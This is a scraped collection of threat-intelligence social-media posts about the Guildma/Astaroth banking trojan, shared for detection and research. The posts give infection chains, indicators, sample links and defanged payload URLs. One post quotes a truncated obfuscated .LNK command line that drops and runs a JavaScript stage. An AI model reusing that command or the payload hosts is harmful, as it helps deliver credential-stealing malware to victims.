#malspam #guildma #astaroth (req. BR ip & win10 useragent)
kadwfisahs.pecaswayne.com[.]br/BRF4J55RC20TABJZT08501N7WXR2E/NFS_E_39757-

.zip→.lnk→.js→bitsadmin→magic→guildma

tria.ge/reports/200304…
app.any.run/tasks/72046102… (force shutdown)
payload sites and files downloaded:

New malware campaign (Guildma/Astaroth?) abusing Avira executable for infection?🤔
#Malware #threathunting #lolbin Florian Roth MalwareHunterTeam

#Malware posible #Guildma 🇧🇷 apuntando a 🇲🇽

- Chain: zip > lnk > js > autoit > rat
- Utiliza varios dominios *.sa.com para la descarga del stage de autoit
- 107 IPs/dominios relacionados

IOCs
pastebin.com/0NcwDbjv

Samples
bazaar.abuse.ch/user/953/

The Tetrade: Brazilian banking malware goes global
securelist.com/the-tetrade-br…
#Melcoz #Javali #Grandoreiro #Guildma #Banking #Trojan #Malware

🎯 Hunting #Astaroth aka #Guildma Infrastructure (1st stage):

Guildma abuses Google services to host the initial payload, furthermore, if the user are not from one of the whitelisted countries then they are redirected to download a Windows Service Pack (.ISO) from Microsoft's…

Guildma: the Latin American Banking Trojan that targets Brazil 🇧🇷 exclusively.
welivesecurity.com/2020/03/05/gui…
All IOCs here:
pastebin.com/egtnGuJA
#Guildma #Banking #Trojan #Malware

#Malware #Malspam - Infra 🇧🇷

- Mailers: 61 📩
- Downloaders: 76 ⬇️
- Algunas familias: Mekotio, Grandoreiro, Guildma

IOCs
pastebin.com/raw/yh2ePsr6

Massive #ursa #loader 2nd stage #opendir at:

http://18.217.112[.]176/m/

dropping #guildma stealer

hash 73cb2c5ffa69123d4257ffebb419a51e on MalShare

cc Few Atoms Kafeine

Guildma is now using Finger and Signed Binary Proxy Execution to evade defenses isc.sans.edu/diary/27482

1/ Interesante campaña de Malware 🇧🇷 (posiblemente #Guildma aka #Astaroth ) dirigido a Chile y LATAM

URL > ZIP > LNK/CMD > WSCRIPT

- Geofenced + Blacklist vía IP y Cookies
- Download vía Cross-Site Scripting (XSS) y HTML5
- Wildcard DNS para rotación de subdominios (únicos)

La secuencia de infección del troyano bancario Guildma.

#KLSEC #CSWLatam #Kaspersky #Evento #Ciberseguridad #Tecnología #Negocios #Noticias #Technology #Business #Cybersecurity #News #T21 Kaspersky Latinoamérica Kaspersky España Kaspersky Brasil

#Astaroth aka #Guildma
26/02/2024 samples updated
bazaar.abuse.ch/browse/tag/812…
AnyRun
app.any.run/tasks/f40cfa6d…

2022-01-17 (Monday) - Brazil malspam pushes #Astaroth ( #Guildma ) malware - IOCs available at: bit.ly/3KtA9vE

2022-09-21 (Wednesday) #Astaroth ( #Guildma ) infection from Brazil malspam - More info at: bit.ly/3f7DIwu

Kimberly MalwareHunterTeam Posiblemente #Guildma

#Guildma aka #Astaroth dirigido a 🇪🇸
Ahora desde sistemaoperacionalmundial[.]com (geofenced) alerta por Marc Almeidaˎˊ˗.

.LNK:

C:\Windows\System32\cONhosT.exe %COMSpeC% /V/D/c 'S^eT RBG=C:\xYNPTO\&& mD !RBG!>nul 2>&1&&S^eT ZBOA=!RBG!^DFDZPWBA.JS&&<nul set/p JMXH=var…

El troyano bancario Guildma o Astaroth roba las contraseñas almacenadas en los navegadores web.

#KLSEC #CSWLatam #Kaspersky #Evento #Ciberseguridad #Tecnología #Negocios #Noticias #Technology #Business #Cybersecurity #News #T21 Kaspersky Latinoamérica Kaspersky España Kaspersky Brasil

Guildma activa un keylogger que captura los datos bancarios que los usuarios ingresan en los navegadores.

#KLSEC #CSWLatam #Kaspersky #Evento #Ciberseguridad #Tecnología #Negocios #Noticias #Technology #Business #Cybersecurity #T21 Kaspersky Latinoamérica Kaspersky España Kaspersky Brasil

I've turned Xienim's string decrypter for Guildma into an Ida python script. Given the address of the decryption function and the key, it will decrypt most strings* and comment them next to where they're referenced
github.com/dodo-sec/Astar…

Güvenlik araştırmacıları, Brezilya’nın ardından Latin Amerika ülkeleri ve Avrupa’ya yayılmış, Guildma, Javali, Melcoz ve Grandoreiro olarak bilinen dört adet bankacılık trojanı tespit edildiğini kaydetti.
#BilgiGüvende #Brezilya #Trojan
bilgiguvende.com/brezilya-merke…